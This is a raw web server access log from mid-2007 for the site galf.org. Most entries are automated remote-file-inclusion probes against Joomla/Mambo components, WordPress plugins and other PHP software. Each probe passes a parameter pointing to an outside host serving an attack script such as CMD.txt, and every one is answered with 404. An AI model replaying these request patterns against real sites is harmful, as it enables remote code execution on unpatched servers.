72.232.122.224 - - [29/Jul/2007:19:52:47 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:19:52:47 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:19:52:49 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:19:52:49 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.111.59.150 - - [29/Jul/2007:19:53:16 -0700] "GET /logs/access_070716.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.phoenixinstitut.at/phoenix/includes/nn? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:19:53:36 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:19:53:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.17.3.183 - - [29/Jul/2007:19:53:39 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:19:53:40 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:19:54:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:19:54:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.12.106 - - [29/Jul/2007:19:55:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.116.12.106 - - [29/Jul/2007:19:55:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:19:57:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:19:57:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:19:57:42 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:19:57:42 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:19:57:43 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:20:00:20 -0700] "GET /logs/index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.173.72.3 - - [29/Jul/2007:20:00:20 -0700] "GET /index.php?pagina=http://broilerassociation.or.th/modules/editor/popups/save_images/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:00:45 -0700] "GET /logs/index2.php?x=http://geocities.com/akantetapi/xx22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:00:45 -0700] "GET /index2.php?x=http://geocities.com/akantetapi/xx22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.54.188.106 - - [29/Jul/2007:20:02:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.54.188.106 - - [29/Jul/2007:20:02:18 -0700] "GET / HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:04 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:04 -0700] "GET / HTTP/1.1" 200 1048 "http://www.google.com.co/search?hl=es&q=%3Fintitle%3Aindex.of%3F+lesbianas&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:20 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:26 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:28 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
190.65.87.241 - - [29/Jul/2007:20:04:29 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.2)" "www.galf.org"
66.249.84.14 - - [29/Jul/2007:20:05:20 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/2007030919 Firefox/2.0.0.3" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:20:06:00 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.232.122.224 - - [29/Jul/2007:20:06:00 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.90.212.33 - - [29/Jul/2007:20:07:22 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.90.212.33 - - [29/Jul/2007:20:07:22 -0700] "GET /logs/access_070716.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cadisass.it/images/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.19.128.27 - - [29/Jul/2007:20:07:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.19.128.27 - - [29/Jul/2007:20:07:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.21.122.224 - - [29/Jul/2007:20:08:32 -0700] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.21.122.224 - - [29/Jul/2007:20:08:33 -0700] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://members.lycos.co.uk/kalafi0r/asd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:08:46 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:08:46 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.124.128.154 - - [29/Jul/2007:20:09:36 -0700] "GET /logs/manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
222.124.128.154 - - [29/Jul/2007:20:09:39 -0700] "GET /manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:14:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:14:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:20:14:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:20:14:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:20:15:38 -0700] "GET /logs/access_070716.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:20:15:38 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.197.129.53 - - [29/Jul/2007:20:15:38 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.170.43.179 - - [29/Jul/2007:20:17:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.111.59.150 - - [29/Jul/2007:20:17:30 -0700] "GET /logs/manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.111.59.150 - - [29/Jul/2007:20:17:30 -0700] "GET /manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://www.grayswood.com/v-webmail/tmp/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:20:17:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.208.65 - - [29/Jul/2007:20:17:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.116.12.106 - - [29/Jul/2007:20:18:27 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.116.12.106 - - [29/Jul/2007:20:18:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.193.143 - - [29/Jul/2007:20:19:46 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.193.143 - - [29/Jul/2007:20:19:47 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:19:49 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:19:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:20:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:20:01 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:20:21:03 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:20:21:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:20:24:05 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.22.90.110 - - [29/Jul/2007:20:24:05 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://cromonimster.com/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:24:09 -0700] "GET /logs/index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:24:09 -0700] "GET /index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:24:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:24:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:20:25:10 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:20:25:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.19.128.27 - - [29/Jul/2007:20:25:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
213.19.128.27 - - [29/Jul/2007:20:25:25 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
77.91.201.60 - - [29/Jul/2007:20:27:37 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.91.201.60 - - [29/Jul/2007:20:27:37 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://uny.ac.id/~bambang/wp-content/plugins/akismet/_log/logs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
89.106.79.20 - - [29/Jul/2007:20:28:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.106.79.20 - - [29/Jul/2007:20:28:15 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:30:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.115.71.76 - - [29/Jul/2007:20:30:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
24.106.121.150 - - [29/Jul/2007:20:31:49 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
24.106.121.150 - - [29/Jul/2007:20:31:49 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:20:32:04 -0700] "GET /logs/index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.54.62.68 - - [29/Jul/2007:20:32:04 -0700] "GET /index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:32:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:32:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.72.166.36 - - [29/Jul/2007:20:32:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.eljardinerodelnorte.com.ar/images/c6.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.120.19.95 - - [29/Jul/2007:20:34:13 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.120.19.95 - - [29/Jul/2007:20:34:14 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://chanartemide.altervista.org/forum/language/lang_english/email/.../.../.../zip.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.254.222.159 - - [29/Jul/2007:20:34:45 -0700] "GET /logs/index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.254.222.159 - - [29/Jul/2007:20:34:53 -0700] "GET /index.php?go=http://jkjk.site.voila.fr/CMD.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:20:37:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.64.202 - - [29/Jul/2007:20:37:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:37:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.17.3.183 - - [29/Jul/2007:20:37:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.circleoftruth.net/phpRaid3/lol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
70.42.186.129 - - [29/Jul/2007:20:39:47 -0700] "GET /?S=D HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows;) NimbleCrawler 2.0.1 obeys UserAgent NimbleCrawler For problems contact: crawler@healthline.com" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:40:13 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.75.10 - - [29/Jul/2007:20:45:57 -0700] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:48:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.242.44.64 - - [29/Jul/2007:20:48:47 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.auktion-tauschangebote.de/counter/f75f403fcc9b0507dd03ec5395ad3e6b.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:20:50:25 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
65.90.251.179 - - [29/Jul/2007:20:50:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.29.75.99 - - [29/Jul/2007:20:50:31 -0700] "GET /logs/!scanhttp://sixfoottwoinches.com//sohoadmin/program/modules/mods_full/shopping_cart/includes/wk?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
72.29.75.99 - - [29/Jul/2007:20:50:31 -0700] "GET /!scanhttp://sixfoottwoinches.com//sohoadmin/program/modules/mods_full/shopping_cart/includes/wk?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
66.7.200.148 - - [29/Jul/2007:20:51:19 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.7.200.148 - - [29/Jul/2007:20:51:21 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
72.29.75.99 - - [29/Jul/2007:20:51:25 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sixfoottwoinches.com//sohoadmin/program/modules/mods_full/shopping_cart/includes/wk?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
72.29.75.99 - - [29/Jul/2007:20:51:26 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sixfoottwoinches.com//sohoadmin/program/modules/mods_full/shopping_cart/includes/wk?? HTTP/1.1" 404 275 "-" "Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000" "www.galf.org"
